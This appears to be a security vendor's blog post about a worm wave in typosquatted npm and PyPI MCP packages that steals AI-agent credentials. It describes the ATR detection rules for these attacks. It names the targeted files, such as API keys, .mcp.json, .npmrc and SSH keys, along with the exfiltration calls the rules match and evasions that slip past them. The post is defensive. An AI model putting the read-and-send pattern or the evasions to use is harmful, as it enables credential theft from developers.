On June 8, 2026, Socket flagged a new wave of the Shai-Hulud worm — tracked as “Hades” / Mini-Shai-Hulud / Miasma. By June 9 the press had it. The novel part, and the reason it matters here: this wave hunts AI-agent credentials.
The packages are malicious npm and PyPI uploads, many of them typosquats of MCP libraries — langchain-core-mcp, instructor-mcp, openai-mcp, tiktoken-mcp, ray-mcp-server. Install or import one and a Bun/Node stealer runs. It reads your ANTHROPIC_API_KEY, your Claude desktop config, and your .mcp.json, then sweeps .npmrc, .pypirc, SSH keys, and cloud credentials, and ships the lot to an attacker endpoint. The campaign rotates package names every couple of days.
Read that target list again. Your Anthropic key. Your MCP config. The files an AI-agent developer has lying around are now the prize.
What ATR detects
ATR is an open standard for agent threats. 464 detection rules, MIT licensed. Rule ATR-2026-00576 covers the Hades credential-theft stage, and it complements ATR-2026-00575, which detects the Miasma agent-config backdoor — the config-injection half of the same campaign.
The rule fires on two shapes:
The targeted read-and-send. Code that reads an AI-agent secret — ANTHROPIC_API_KEY, the Claude config, .mcp.json — and is co-located with an outbound network send (requests.post, fetch, urllib, curl). The read alone is fine; the read next to an exfil is the attack.
The harvest-everything sweep. Code that pulls two or more credential stores — .npmrc, .pypirc, AWS credentials, SSH keys — where one of them is an AI-agent secret, and pipes the bundle to a remote host.
Be clear about what this is. It matches the signature: an agent-credential read beside an exfil. It does not read minds. A variant that builds the env-var name from char codes, or exfiltrates over DNS, will slip past a pattern match — the literal tokens never appear. Pattern detection catches the known shape. Run it as one layer, not the only one.
Run it
npx agent-threat-rules scan .If it flags a package or a file you did not write, treat the checkout as compromised. Rotate your Anthropic API key first — that is the one with a live blast radius — then the npm, PyPI, cloud, and SSH credentials. Then audit recent installs for typosquatted MCP package names.
The rules are open. Read them, test them, send us a variant we miss.